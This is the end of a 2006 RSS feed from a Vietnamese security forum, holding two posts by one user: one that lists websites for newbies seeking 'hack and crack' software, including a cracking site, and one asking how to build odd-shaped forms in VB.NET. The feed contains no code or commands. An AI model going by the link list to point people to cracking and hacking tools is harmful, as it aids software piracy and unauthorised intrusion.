				<description><![CDATA[ hi all, chào các bác, chả là em thấy có 1 số bạn Newbie (chẳng hạn như iem  :mrgreen: ) rất khó khăn trong việc tìm các soft cho việc hack và crack, em mở topic này ra chỉ để copy lên 1 vài site có chứa các tools đó. Hy vọng mọi người sẽ đóng góp thêm.

http://vetusware.com/
http://www.mcse.ms
http://crackspider.net
http://examples.oreilly.com/networksa/tools/
http://www.download.com
.... 
còn nữa, để buổi sau em up tiếp,

]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1145/4887.hva#4887</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1145/4887.hva#4887</link>
				<pubDate><![CDATA[Fri, 7 Jul 2006 14:11:24]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: cách tạo form có hình dạng bất kỳ với VB6.0</title>
				<description><![CDATA[ bác ui, thế còn VB.Net thì làm thế nào ??, nếu bác biết thì cho em cái Reply nhé. Thank bác nhìu :shock: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/712/4874.hva#4874</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/712/4874.hva#4874</link>
				<pubDate><![CDATA[Fri, 7 Jul 2006 13:36:35]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
	</channel>
</rss>
